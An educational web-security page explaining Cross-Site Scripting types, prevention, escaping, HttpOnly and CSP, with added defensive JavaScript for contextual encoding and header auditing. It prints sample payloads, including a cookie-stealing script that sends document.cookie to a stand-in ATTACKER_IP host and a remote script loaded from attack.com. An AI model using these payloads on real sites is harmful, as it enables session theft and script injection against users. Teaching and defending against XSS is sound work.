โŒ
XSS
Cross-Site Scripting (XSS) is a web vulnerability that lets an attacker inject script into a web page viewed by other users. The injected script runs in the victim's browser with the origin of the vulnerable site, so it can do anything that site's own scripts can (read session data, alter page content, send authenticated requests), which is how it bypasses the browser's access controls. It is one of the most common vulnerability classes on the web, reportedly accounting for more than 84% of all bugs, and one of the best paid, with more than $4 million awarded in bounties in 2020 alone. Payloads are written in whatever the browser will execute, in practice JavaScript delivered through HTML.
  • HTML allows inclusion of executable scripts within documents using <script> tags
  • Websites use these scripts to make pages interactive and control app logic
```html
<!-- Inline script: runs where it appears in the document -->
<script> alert("Hi"); </script>

<!-- External script: the browser fetches and runs the file at the src URL -->
<script src="This-is-a-webpage-link"></script>

<!-- Redirects the victim's browser to another site -->
<script> location="http://www.moo.com";</script>

<!-- Using XSS to steal cookies in example below if HttpOnly flag not set:
     the browser requests the "image", sending the cookies as a query string -->
<script> image = new Image();
image.src='http://ATTACKER_IP/?c=' +document.cookie; </script>
```
Inline scripts: Scripts embedded within an HTML file (not loaded from elsewhere)
Validating user input: App checks that user input meets a standard (expected format, length, character set; no malicious JS)
Sanitizing input: App modifies or removes characters in the input that interfere with HTML logic before processing it
Types of XSS:
  1. Stored
  2. Reflected
  3. DOM-based
Stored XSS: When user input is stored on the server and later retrieved unsafely. The app accepts user input without validation, stores it server-side, and later renders it in other users' browsers without sanitization or encoding
  • The payload makes its way into the database and from there into every victim's browser
  • Most severe XSS type: the victim only has to view the affected page
  • The malicious script lives on the target app's own server and is served to everyone who accesses the affected content
Blind XSS: A stored XSS variant whose malicious input is stored by the server and executed in another part of the app, or in another app, that the attacker cannot see (for example, an internal dashboard that renders submitted support tickets). The attacker only learns it fired through an out-of-band callback such as the cookie-stealing request above.
Reflected XSS: When user input sent in a request is echoed back in the immediate response without being stored. The app takes the input (e.g. a URL parameter), processes it server-side, and returns it in the page, so the victim has to be tricked into sending the crafted request, usually by clicking a link.
DOM-Based XSS: The DOM (Document Object Model) is the in-memory tree a browser builds to render a page; DOM-based XSS targets that tree directly.
  • Similar to reflected XSS, but the payload never reaches the server: client-side JavaScript reads it from a source such as location.hash or document.referrer and writes it into a sink such as innerHTML or document.write
  • Because the server never sees the payload, server-side validation and logging do not catch it
Self XSS: Requires the victim to enter the malicious payload themselves (e.g. paste it into the browser console or into a field only they can see)
  • Requires social engineering
  • Typically out of scope for bug bounty programs
Prevention: Implementing controls
  1. Robust input validation
  2. Contextual output escaping and encoding
Escaping: The practice of encoding special characters so that they are interpreted literally instead of as a special character by the programs/machines that process the characters.
  • Ensures browsers won't misinterpret characters as code to execute
```html
<!-- Event-handler attribute: fires when the image loads -->
<img onload=alert('image') src="example.png">
<!-- javascript: URL, e.g. placed in an href or src attribute -->
javascript:alert('hi')
<!-- Benign image reference, for comparison -->
<img src="IMAGE" />

<!-- Common Payloads -->
<iframe src=javascript:alert(1)>
<body onload=alert(1)>
"><img src=x onerror=prompt(1);>
<script>alert(1)<!--
<a onmouseover="alert(1)">test</a>
<script src=//attack.com/test.js></script>
```
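The prevention list above says "contextual" escaping for a reason: the same untrusted string needs a different encoder depending on whether the template drops it into HTML text, a quoted attribute, a JavaScript string literal or a URL attribute. The following is an added example (not code from the original page) that implements those encoders in plain JavaScript and runs them against payloads shaped like the ones listed above. The page template, payload strings and function names are constructed for the demo.

```javascript
// Added example, not code from the original page: contextual output
// encoding. The same untrusted string needs a different encoder depending
// on where the template puts it: HTML text, a quoted attribute value, a
// JavaScript string literal, or a URL attribute. Encoding for the wrong
// context leaves the injection open.

// HTML text and quoted-attribute context: neutralise the five characters
// that can change HTML structure. The template must put attribute values
// in quotes; in an unquoted attribute a space alone ends the value.
function encodeForHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// JavaScript string-literal context: \xHH / \uHHHH-escape everything that
// is not alphanumeric, so no quote can end the literal and no "</script>"
// can end the script block the literal sits in.
function encodeForJsString(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, (c) => {
    const code = c.charCodeAt(0);
    return code < 0x100
      ? '\\x' + code.toString(16).padStart(2, '0')
      : '\\u' + code.toString(16).padStart(4, '0');
  });
}

// URL attribute context (href/src): encoding is not enough, because
// "javascript:alert(1)" is still a valid URL once encoded. Allowlist the
// scheme first, then attribute-encode. Relative and scheme-relative URLs
// (//attacker/x.js) are rejected here too; a real app would resolve them
// against its own origin before the check.
function safeUrlAttr(s) {
  let url;
  try {
    url = new URL(String(s));
  } catch (e) {
    return '#';
  }
  if (url.protocol !== 'http:' && url.protocol !== 'https:') return '#';
  return encodeForHtml(url.href);
}

// A reflected "search results" page, vulnerable: the query is concatenated
// raw into three different contexts.
function renderUnsafe(query) {
  return `<p>You searched for: ${query}</p>\n`
    + `<input name="q" value="${query}">\n`
    + `<script>var lastQuery = '${query}';</script>`;
}

// The same page with an encoder chosen per context.
function renderSafe(query) {
  return `<p>You searched for: ${encodeForHtml(query)}</p>\n`
    + `<input name="q" value="${encodeForHtml(query)}">\n`
    + `<script>var lastQuery = '${encodeForJsString(query)}';</script>`;
}

// Count opening <script tags in rendered HTML; the safe page must have
// exactly one (the template's own).
function countScriptTags(html) {
  return (html.match(/<script\b/gi) || []).length;
}

// Constructed payloads, one per context, shaped like the list above.
const PAYLOADS = [
  '"><img src=x onerror=prompt(1);>',      // breaks out of the attribute
  "';alert(1)//",                          // breaks out of the JS string
  '</script><script>alert(1)</script>',    // ends the script block early
];

function demo() {
  return PAYLOADS.map((p) => ({
    payload: p,
    unsafeScriptTags: countScriptTags(renderUnsafe(p)),
    safeScriptTags: countScriptTags(renderSafe(p)),
    safeStillHasImg: /<img/i.test(renderSafe(p)),
  }));
}

console.log(demo());
```

Note what `safeUrlAttr` does differently from the other two: a `javascript:` URL survives entity encoding unchanged, so the URL context needs an allowlist on the scheme before any encoding, which is the same reason input validation and output encoding are listed as separate controls above.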
Measures to mitigate:
  • Set the HttpOnly flag on sensitive cookies (e.g. session cookies)
    • Stops injected script from reading them via document.cookie, so the cookie-stealing payload above fails
    • Does not stop the script from sending authenticated requests from the victim's browser, so it limits the damage rather than preventing XSS
  • Content Security Policy (CSP)
    • Lets the page restrict which sources of JS, CSS, and images the browser may load, and whether inline scripts are allowed to run
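The two mitigations above are carried by response headers: Set-Cookie (the HttpOnly flag) and Content-Security-Policy (the restriction on which JS, CSS and image sources a page may load). As an added example, not code from the original page, here is a small header audit that parses both and reports settings that still let injected script run or read cookies; the weak and hardened header values are constructed for the demo, and the function names are my own.

```javascript
// Added example, not code from the original page: a small audit of the two
// response headers that carry the controls discussed above. Header values
// are constructed for the demo.

// Parse "directive src src; directive src" into Map(directive -> [sources]).
function parseCsp(policy) {
  const directives = new Map();
  for (const part of policy.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const [name, ...sources] = tokens;
    directives.set(name.toLowerCase(), sources);
  }
  return directives;
}

// Report script-src settings that still let injected script execute.
// script-src falls back to default-src when absent, as browsers do.
function cspWeaknesses(policy) {
  const findings = [];
  const d = parseCsp(policy || '');
  const sources = d.get('script-src') || d.get('default-src');
  if (!sources) {
    findings.push('no script-src or default-src: any inline or remote script runs');
    return findings;
  }
  const lower = sources.map((s) => s.toLowerCase());
  // A nonce or hash source makes browsers ignore 'unsafe-inline' (CSP level 2+).
  const hasNonceOrHash = lower.some((s) => /^'(nonce|sha(256|384|512))-/.test(s));
  if (lower.includes("'unsafe-inline'") && !hasNonceOrHash) {
    findings.push("'unsafe-inline': injected <script> and on* handlers run");
  }
  if (lower.some((s) => s === '*' || s === 'http:' || s === 'https:')) {
    findings.push('scheme or host wildcard: <script src=//attacker/x.js> loads');
  }
  if (lower.includes("'unsafe-eval'")) {
    findings.push("'unsafe-eval': eval()/new Function() on attacker data runs");
  }
  return findings;
}

// Report a Set-Cookie header whose cookie can be read by document.cookie.
function cookieWeaknesses(setCookie) {
  const attrs = (setCookie || '').split(';').map((a) => a.trim());
  const name = attrs[0].split('=')[0] || '(unnamed)';
  const flags = attrs.slice(1).map((a) => a.toLowerCase());
  return flags.includes('httponly')
    ? []
    : [`cookie ${name}: no HttpOnly, exposed to document.cookie`];
}

function auditHeaders(headers) {
  return [
    ...cookieWeaknesses(headers['set-cookie']),
    ...cspWeaknesses(headers['content-security-policy']),
  ];
}

// Constructed weak and hardened responses.
const WEAK_HEADERS = {
  'set-cookie': 'session=abc123; Path=/',
  'content-security-policy': "default-src 'self'; script-src 'self' 'unsafe-inline' https:",
};
const HARDENED_HEADERS = {
  'set-cookie': 'session=abc123; Path=/; HttpOnly; Secure',
  'content-security-policy': "default-src 'self'; script-src 'self' 'nonce-r4nd0m'; object-src 'none'",
};

console.log(auditHeaders(WEAK_HEADERS));     // three findings
console.log(auditHeaders(HARDENED_HEADERS)); // []
```

The weak policy is a common one: `'unsafe-inline'` re-enables every `<script>` and `onerror=` payload on this page, and the bare `https:` source lets `<script src=//attack.com/test.js>` load. The hardened policy replaces both with a per-response nonce that only the server's own script tags carry.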
Polyglot: A type of XSS payload that executes in multiple contexts